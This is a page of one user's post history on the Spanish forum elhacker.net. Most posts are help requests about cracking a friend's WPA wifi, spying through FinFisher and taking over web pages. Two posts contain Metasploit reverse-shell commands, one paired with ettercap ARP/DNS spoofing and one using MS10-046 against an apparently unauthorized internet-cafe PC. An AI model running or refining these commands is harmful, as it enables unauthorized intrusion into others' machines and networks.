elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Curso de javascript por TickTack


  Mostrar Temas
Páginas: 1 [2] 3
11  Programación / Programación C/C++ / Ejecutar lineas de batch desde C++ en: 28 Abril 2013, 23:53 pm
hola, :D
Lo que sucede es que necesito ejecutar varias lineas de código Batch, pero necesito que se haga desde C++, es decir, ir escribiendo el código en C++ (utilizando Dev C++)y seguidamente añadir las lineas de Batch , lo que sucede es que no se como hacerlo, ya busque bastante tiempo no encontré nada, cualquier comentario ayuda.

De antemano muchas gracias.
12  Seguridad Informática / Nivel Web / Hack para HTML en: 12 Abril 2013, 21:29 pm
Hola,
Me gustaria saber si hay alguna forma de "apoderarme" de una pagina web escrita en html, no se, alguna vulnerabilidad o alguna tecnica. Disculpen mi ignorancia, soy nuevo en esto.

De antemano muchas gracias. ;D
13  Seguridad Informática / Hacking Wireless / Obtener clave WPA-TKIP en: 12 Abril 2013, 21:19 pm
hola compañer@s,
:huh: Solicito su ayuda, hace poco me surgio a "necesidad" de obtener el pasword de una red wifi ajena (de un amigo que me reto a obtenerla) , el problema es que es WPA-TKIP, intente "crackearla " y no pude, entonces se me ocurrio crear una red AD HOC insegura (para que el me "robe" internet pensando que soy alguien descuidado que dejó sin contraseña su modem) para que el se conecte a mi,y utilizando esa conexion obtener el la clave.
Estoy utilizando Backrack5r3 contra el Windows (Xp, 7 o Vista, no lo se) de mi amigo, durante esta practica me encontre con varios problemas, el primero, cree la red, pero cuando voy a "Sistema>Preferencias>Conexiones de red" no aparece; el segundo, probé con la pc de mi hermano para saber si aparecia mi red ad-hoc, y efectivamente aparece,el se conecta normalmente, pero cuando uso "nmap"  contra la pc de mi hermano no se inicia sale un error y no escanea, reviso la conexion con el comando "iwconfig wlan0" y aparece conexion a mi red ad-hoc, pero con el "Wicd Network Manager" me aparece conectar,al momento de conectar aparece error al obtener direccion ip, es decir, no se supone que si yo cree la red automaticamente no estoy conectado?.

Muchas gracias de antemano, cualquier comentario ayuda.  ;D

Pd: me disculpo por haber publicado por error el mismo tema en el foro de dudas generales. :-\

[MOD] borrado de dudas generales.
14  Seguridad Informática / Hacking / metaslploit y ettercap - problemas en: 24 Febrero 2013, 16:56 pm
hola,
estoy utilizando backtrack5r3 x64 para tratar de obtener una shell de un equipo (linux-x86) de mi red, creo el exploit y utilizo ettercap para un redireccionamiento a la ip venenosa, pero no funciona, no se que pueda ser, ya modifique el archivo etter.dns, todo parece estar bien, no se que sea. aqui escribo mi codigo:

+++en una consola+++
    msfconsole
    use set payload linux/x86/shell/reverse_tcp
    set srvhost mi-ip-privada
    set srvport 4444
    set uripath /
    set lhost mi-ip-privada
    set lport 23
    exploit
    #el exploit funciona aparentemente

+++en otra consola++++
    ettercap -T -q -P dns_spoof -M arp // // -i wlan0
    #redirecciona correctamente cualquier pagina a mi ip

aparantemente todo deberia funcionar, aunque se que estoy haciendo algo mal, por eso recurro a uds, cualquier aporte ayuda, de antemano muchas gracias.
15  Seguridad Informática / Hacking / metasploit atacando windows7 desde backtrack5r3 en: 28 Noviembre 2012, 03:53 am
hola,
he estado intentando conectarme a un pc con windows7 aprovechndo la vulnerabilidad  MS10-046 con metasploit, pero no me funciona, este el el codigo que utilizo:

msf>    use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
      set payload windows/meterpreter/reverse_tcp
      set srvhost mi-ip
      set lhost mi-ip
      exploit

el problema esta en que no me funciona, intento acceder desde mi casa a una pc de un "cafe internet", no se que estoy haciendo mal, por eso recurro a ustedes.(utilizo backtrack5r3 x64 y la pc windows es windows7 home-premium x64)

de antemano muchas gracias
16  Foros Generales / Dudas Generales / proxychain en backtrack5r3 en: 19 Noviembre 2012, 03:28 am
hola,
alguien podria indicarme el procedimiento para instalar una proxychain en backtrack 5r3.

de antemano muchas gracias
17  Foros Generales / Dudas Generales / Alguien sabe donde descargar el f i n f i s h e r? en: 14 Noviembre 2012, 21:24 pm
hola

alguien sabe donde descargar el troyano f i n f i s h e r? (sin espacios)

de antemano muchas gracias
18  Comunicaciones / Redes / duda sobre wpa.darkircop.org en: 12 Noviembre 2012, 21:51 pm
hola,

alguien sabe como usar el servicio que ofrese esta pagina
http://wpa.darkircop.org/


19  Sistemas Operativos / GNU/Linux / Solicito ayuda : error con el kernel de backtrack 5 r3 en: 6 Noviembre 2012, 04:27 am
hola,
acabo de instalar backtrack 5r3 en mi pc y cuando quiero instalar los drivers de mi tarjeta gráfica (ati) me sale un error que tiene que ver con un mal funcionamiento del kernel, no se que hacer, ademas tampoco puedo correctamente un idioma por el mimo error,(todo lo hago desde en super usuario root) que debo hacer?

de antemano muchas gracias
20  Programación / Scripting / como hacer que en una instalación que necesita datos estos se escriban solos en: 12 Febrero 2012, 21:29 pm
hola, :huh:
estoy modificando un archivo de instalación que tiene la extensión es .msi, el problema es que esta instalación necesita que le ingresen unos datos, los cuales son el correo y un nombre, lo que yo necesito es que cuando haga doble click inicie normalmente y cuando pida los datos se escriban solos o que aparezcan por defecto.
gracias     

cualquier opinion sirve ;-)
Páginas: 1 [2] 3
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines